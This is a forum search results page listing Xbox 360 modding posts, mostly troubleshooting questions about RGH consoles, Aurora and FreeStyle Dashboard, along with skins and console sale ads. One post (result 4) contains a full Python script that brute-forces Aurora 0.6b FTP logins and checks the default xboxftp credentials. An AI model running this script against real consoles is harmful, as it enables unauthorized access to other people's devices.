Jump to content
RealModScene

Search the Community

Showing results for tags 'Xbox360'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Site News
    • Scene News
  • Phoenix
    • Aurora releases
    • Aurora support
    • Aurora Localization
    • Skins, Coverflow Layouts, Scripts and Trainers
    • Skin development and LUA scripting
    • Unity Support
    • Requests and Suggestions
  • FreeStyle Dashboard / F3
    • News
    • FreeStyle Dashboard Releases
    • Support
    • Skins
    • Skin Dev
  • Xbox
    • Tutorials
    • Homebrew
    • LibXenon
    • Games
    • Software
    • Other topics
  • PlayStation
    • Tutorials
    • Homebrew
    • Games
    • Software
    • Other Topics
  • Matchmaking
    • North America
    • Central & South America
    • Europe
    • Asia
    • Africa
    • Australia
    • Modded Lobbies
  • MarketPlace
    • Buy
    • Sell
  • Miscellaneous
    • Feedback
    • Other Topics
    • LiNK News

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 70 results

  1. Hey guys , Hope you all are doing great! I thought so many times before making this thread that wether i should post in some old ones or i should make a new one but finally i decided to make one so that everyone having similar questions in their mind like me can get thier answers straight. So the thing is about Multiple Disc Games which i came to know are of three types 1. Install/Play 2. Play/Play & 3. Unique Scenarios Talking about the second case which is Play/Play Discs I am done with almost half of Max Payne 3(Extracted from ISO to XEX format) playing through Aurora .6b and to play the next chapter the games asks me that a (Disc Change : Insert Disc 2 to Contine) swap is going to be required which i select as yes and disc swap pop-up disappears and after a couple of seconds of game dramatic video of the next chapter game freezes! I have (K17511) (Dashlaunch 3.18 with Autoswap disabled) (FSD3Rev775 with FSD Plugin loaded) and (Aurora 0.6b with Dashlaunch=Active, Freestyle Plugin=Active, and FTP=Active) As per other threads i thought may be folder structure is not right which was HDD1: Xbox360XEX\Max Payne 3 Disc1 HDD1: Xbox360XEX\Max Payne 3 Disc2 ˆˆˆˆAbove were actually two Separate folders and 2 Discs were being showed in the Game List both in FSD3 and Auroa So this i thought may be this not the right folder structure and changed it to HDD1:Xbox360XEX\Max Payne3\Disc 1 HDD1:Xbox360XEX\Max Payne3\Disc 2 Which is a main Max Payne 3 folder with two subfolders as "Disc 1" & "Disc 2" But still the same issue! Game Freezes after Disc Swap Next I tried deleting the title update = Same issue Reinstalling the title update= Same issue Tried to play from FSD3 itself = Same issue Then i read in a thread maybe its Aurora 0.6b Bug so I Installed Aurora 0.7b in which what happens is after disc swap selection as yes it restarts Disc 1 again Aurora 0.7b is not showing that wether Freestyle Plugin is loaded or not like Aurora 0.6b but shows for Dashlaunch FTP and NOVA in the settings. I also tried moving the hide disc 2 by moving it in no section but no help! Also checked from backup the game files are Complete Can someone help me out in this please! Any Suggestions Help will be highly appreciated!
  2. RGH with hard drive and menus paid it comes with 4 controllers a HDMI, power brick, console, leds with remote and play and charge kit plus mic comes with lifetime on different servers message me for more proof and details
  3. So i got a slim E series (corona v6) with a ace v3 installed. Problem is it takes forever to boot sometimes, its very incosistent, sometimes its insta boots, sometimes boots within 3-5 cycles but most of the times it takes between 10-15 cycles before it boots. So i did some research and found that i could tune it with some capacitors for a better and more consistent boot ( i already trimmed the wires but that didnt improve boot times) So the caps i bought are ceramic 10uf 50v. Is it ok to use a cap with such a high voltage, if not what rating caps would u guys recommend. Also my 360 has the winbond 2kb ram, heard 360 with them are problematic to glitch, could this contribute to the inconsistent boots? Link to caps i bought: https://m.ebay.com/itm/20Pcs-Lot-50V-475-335-106-225-Monolithic-Ceramic-Chip-Capacitor-5-08mm/192156148520?_mwBanner=1&ul_ref=https%3A%2F%2Frover.ebay.com%2Frover%2F0%2F0%2F0%3Fmpre%3Dhttps%3A%2F%2Fwww.ebay.com%2Fulk%2Fitm%2F192156148520%26rvr_id%3D0%26rvr_ts%3Dc7adcac11630aad325468656fff9c2fc&ul_noapp=true
  4. # Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce # Date: 20/12/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: http://phoenix.xboxunity.net/#/news # Tested on: XBOX 360 # GREETZ: Iker Legorreta, #RemoteExecution Team #!/usr/bin/env python # -*- coding:utf-8 -*- __author__ = 'Daniel Godoy' import argparse import sys from ftplib import FTP info = ''' XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n Usage: ./xbox_ftp_brute_forcer.py [options]\n Options: -t, --target <hostname/ip> | Target\n -u, --user <user> | User\n -w, --wordlist <filename> | Wordlist\n -h, --help <help> | print help\n Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt ''' def help(): print info sys.exit(0) def check_default_login(target): try: ftp = FTP(target) ftp.login('xboxftp', 'xboxftp') ftp.quit() print "\n[+] Default login is open." print "\n[+] Username : xboxftp" print "\n[+] Password : xboxftp\n" ftp.quit() except: pass def ftp_login(target, username, password): try: ftp = FTP(target) ftp.login(username, password) ftp.quit() print "\n[*] Credentials have found." print "\n[*] Username : {}".format(username) print "\n[*] Password : {}".format(password) return True except: return False def brute_force(target, username, wordlist): try: wordlist = open(wordlist, "r") words = wordlist.readlines() for word in words: word = word.strip() if ftp_login(target, username, word): break except: print "\n[-] There is no such wordlist file. \n" sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("-t", "--target") parser.add_argument("-u", "--username") parser.add_argument("-w", "--wordlist") args = parser.parse_args() if not args.target or not args.username or not args.wordlist: help() sys.exit(0) target = args.target username = args.username wordlist = args.wordlist brute_force(target, username, wordlist) check_default_login(target) print "\n[-] Brute force finished. \n" a simple code that allows attacking teams that have FTP enabled with the default password. the console must have aurora 0.6b installed and have ftp enabled
  5. Hello guys, I'm trying to upgrade my Xbox 360 (Corona v2 4GB) to the latest kernel 175711 in order to apply M$ avatar updates. But everytime I try to upgrade from my current version 16547 it flashes ok, but the version stays the same. I thought it was because I had a very old version of kernel, so I first tried to upgrade to 16767 but even this one did not work. Please find attached some images of my XeBuild config and my updflash.bin. The tutorial I tried to follow is this one: http://forum.homebrew-connection.org/index.php?topic=144.0 updflash.bin Thanks in advance you all! Glitch/Nand Reader Product(s) used: Simple_360_NAND_Flasher_v1.2Console Type: Corona V2 4GNAND size: 4GBDashboard version: 2.0.16547.0CB version: Screenshot of NAND details from J-Runner/Xebuild GUI:(attach an image to your post)J-Runner/Xebuild Gui log:updflash.bin log (if applicable): in attachmentDescription of problem: I try to upgrade the kernel version, the kernel version stays the same.updflash.binWas the console working before you started: Y updflash.bin xeBuild_GUI.log
  6. ? Hey guys.. What a bad day. My previous 360 Phat (Fffffalcon board) bummed out on my, so I bought another working board for a few bucks. After I removed the complete R-JTAG with all QSB's and reinstalled it into the new Jasper board, I couldn't get it to glitch (POST79 LOAD_XAM each time although XELL should not get to 79). Some time later I decided to wire the AUD_CLAMP manually using the 2 x 1N4148 diodes and an optional resistor method, as the little QSB suffer previous damage. As soon as I did that I started getting RRODs each time I try to boot XELL. I triple check everything and found that I accidentally soldered the AUD_CLAMP wire to Q2N3 instead of Q2N1 ? Do you guys think I fried it? Gettin 0022 RROD with each try AND with the whole R-JTAG disconnected ?☹️? EDIT: Error 0022 not 0010 sorry
  7. Can someone give me TU 53 for Minecraft Xbox360? Preferably a MEGASync download, but any download will do! Thanks!
  8. Sorry if this question has already been answered... was too lazy to run a search. I was able to get COD blackops 3 iso tried converting it with exisco but for some reason it didn't work. Is there any other way to convert iso to jtag format?
  9. Hello there, I'm new to this community, so I thought this section will be the best to ask for help. Sorry if I'm wrong. So lets start, I have a black xbox 360, which was made in 2012 - 09. I got it cracked so I could play any game I want, it worked fine. But few days I ago I decided to try and install either nba 2k16 or nba 2k17, I installed it, but when I wanted to play it, didn't work. An error occurred: "the game couldn't start, try downloading the game". I searched up the net, and few suggested to update the FSD3, which I already did, but it didin't help. So basically, I'm playing games from my xbox 360 250gb hdd, I've got there installed like: UFC, gta v, wwe 2013 and so on. All of these games works fine, but they got installed by me few years back. Neither of NBA worked for me, what could be the case? I have xexmenu 1.1, never updated kernel(dont know even what that is), FSD3 up to date, I use iso2god to convert straight to usb and then put the game in to the xbox from the usb. Thanks in advance, I hope I explained everything as clearly as possible.
  10. hi guys now let's cut to the chase a while ago i had a cutscene stutter in any game posted a topic a bout it swizzy told me to do some things including change my HDD as a last resort but i can't buy a new one right now so did what he told me to blow the dust from the fan and stuff and it worked no more stuttering cutscenes but 3 days ago i downloaded minecraft story mode first time worked fine but second time it began to stutter and so is devil may cry i have the HD collection finished first 2 fine when i started playing the third it began to stutter in cutscenes im attaching a video from the stuttering in minecraft it's just the title screen but it's affecting the game too im talking alot but i need to know the bottom of this ok last thing all this stuttering began a while after i modified my gamer profile so i can put avatar items in as you can see from the photo after modifying it the XboxLive word showed up there i added a 1000 or more avatar items it slowed up the console and crashed a couple of times so deleted them but my GP still modified and the console still laggy and the game stuttery and as you can see from the other photo the console TEMP is okay so the stupid question i always ask what can i do to fix it BTW im using aurora and FSD blugin for system link which i don't use it at all
  11. good night i want to know how i can connect mi pc with mi xbox 360 with aurora for to se mi files in my console i know with fsd i can with samba but with aurora i dont know how so if someone could give me a tutorial thanks
  12. Greeting everyone. I need help guys, I have a *Corona RGH xbox 360 E* which play perfectly fine, But I am a bit concerned about the temperature of the console. I'll include info down below: CPU target: 82 GPU target: 78 EDRAM: 76 ... Fan speed: 70 Note: The fan speed is good for me, i don't need to change that only if it absolutely necessary. These are the temperature aurora showing: Now the question is do these temperature [ considering the very hot weather ] are normal? If no, what do i need to do to make it drop?
  13. Hello guys! I have an xbox360 FAT Jasper with RGH and Aurora 0.5b DB. My console have no wifi (because it's FAT) and the back USB and Internet RJ45 is broken and it came out. I can't open console and solder it. I have hmm about 15 games with no covers. In FSD3 i had the same problem. My question is: Can I manually put the PNG or JPG covers form PC (USB stick) to any folder in Aurora's data? I haven't got friend with xbox360 so i can't copy a data file and i can't use FTP. I know about a wifi to USB adapter but it's too expensive for me PS. Sorry for my bad English
  14. I ve tried everything i have found on internet regarding to put my Xbox Online on System LiNK :'( Now i have Aurora Pheonix i need your help guys still my System LiNK is greyed out at every game. For the test of System LiNK, Everything is passed except UPNP router detection which i thnk not a big Deal Need your help guys Your response will be highly appreciated. Thanks in Advance btw P.S Sorry for my bad english i guess
  15. I just bought a xbox360 With FSD 2.2 (I thínk) and ran into som problems... Downloaded some new games and didn't see them in the "360 games"-menu, so I got in to the settings and found out that I'll have ro rescan before the new games will show up. At the same time I unchecked the Box "don't scan on startup" (can't remember exactly what it said) and thought that's a good idea to make the Xbox scan everytime it started.. but not. From now on it freezes and I can't undo this setting. It starts normally but just after it's finishes and the menys shws up, it freezes. Anyone tha's been having the same issue? is it possible to undo this? //joQue
  16. Skin based on a compilation of images of Mass Effect mass effect metal music and animation background size approx 50mb aurora supports version 0.5 Skin.xzp place the file in the following path: / HDD1 / Aurora / Skins Layouts includes a custom file so that the covers look smaller and you can enjoy the best aspects of skin that you can see on the 3rd picture of the post. path: / HDD1 / Aurora / Media / Layouts MassEffectSkin.rar
  17. Hello, I have a cracked Xbox 360 with Aurora 0.3. The Aurora was installed over freestyle 3. When I download games, in which directory to copy the files to ? Guy
  18. Hi guys !! i haave a problem with this game !! everthing it's okey : my msg problem is ........ :( what i will do ?
  19. Hi Guys Wssp !! How i can extarcting gta san andreas files on my usb bcz I can not find "default.xex" what i will do ? can u help me guys ♥
  20. skin based on star wars with a compilation of images of the saga skin.xzp place the file in the following path: / HDD1 / Aurora / Skins Layouts includes a custom file so that the covers look smaller and you can enjoy the best aspects of skin that you can see on the image 3DA post . path: / HDD1 / Aurora / Media / Layouts StarWArSkin.rar I apologize for my bad English and my domain if I made any error in the publication of this work
  21. hi, i have a problem on my xbox360, when i inserted dvd into my xbox, its only read as xbox360 dvd, i couldn't extract the game content whether using fsd or xexmenu. i only managed to play the game by extracting it using xbox image browser on pc, and transfer to my external hdd for my xbox. my xbox using Corona motherboard, Freeboot RGH 2.0 and have been updated to latest dashboard. plz help i ve attach the setting that i use during my last dashboard update using xebuild gui
  22. I just downloaded Samurai Showdown Sen for my xbox like for a whole 2 days. Then, when I viewed it, it contained only 1 xex file, But then, when I tried to extract it, it told me to put in the password first to complete the process. I used winrar btw. I opened the Readme.txt file, which the torrent of that game also included and it said there that I had to go either of this whatever sites and get the password, which is obviously a virus that they made. So now im clueless on how to unlock this one. I tried that one app which uses brute force to crack the pass but didnt work. do you guys happen to know how to solve this?? Pleasee!!!!
  23. hi i use the website xboxunity for the covers and i use sign in to my acount in xboxunity and in my xbox360 console (i dont know why but every time i sign in to the unity acount in my console and go back to my game and go back again to the sign in it sign out... ) and another thing i dont know wahy but i push on the button "push to xbox" and than refrash artwork on my xbox and it does'nt do nothing so what can i do? it says that it moved to my Q (i dont know that is that Q that they are talking about and also where is it..) so thanks in against to the helpers saar
  24. Hey Guys, Up for sale, Modded Trinity Rev C. Coolrunner installed Includes fsd Dash 775 FakeAnime 500 gig internal Hard disk With Xbox original compatibility Partition, Controller, Power Brick, In Excellent Shape The mod was done by me I included a Video On youtube of it running glitch time normal within 5 to 25 secs. The Entier thing has been gone through including right down to cleaning the laser As I do all work myself... I will stand behind what I sell. Which means If anything is wrong I WILL FIX IT... I do not want a bad name... I fix and Jtag Consoles in my spare time and have been doing this since 2007. I want 225 for it.. All software is installed and ready for you to put whatever you want on it... I accept Paypal I am In Alabama Depending on where it will be shipped is what the final price will be so it would be 225 + shipping. I will ship with a tracking number of course and signiture will be required. Thank you Tony Video of it Running Below. http://www.youtube.com/watch?v=jkWU0_LaOM0 Photos of work Done:
  25. Someone has made my Xbox360 Slim RGH 2.0 and it worked for a while BUT when i made some changes: turn off content controls in NXE or change the threshold temps in Dashlaunch, My Xbox360 has going mad! When i turn my Xbox360 on the fan spins at 100% for a few seconds and i sometimes get the E79,E71,E72 Error message. It looks like it writes something to the nand when i change a setting and my nand gets corrupt. When i flashed my nand again with Xell it gives me a lot bad blocks (a whole list) and now it even won't boot at all (also Xell won't work) The guy who Glitched my Xbox360 has fixed this already a few times but i want to know the reason for this problem so i can do something about it. Can someone help me with this? because it really frustrates me this happens to me every time.....
×
×
  • Create New...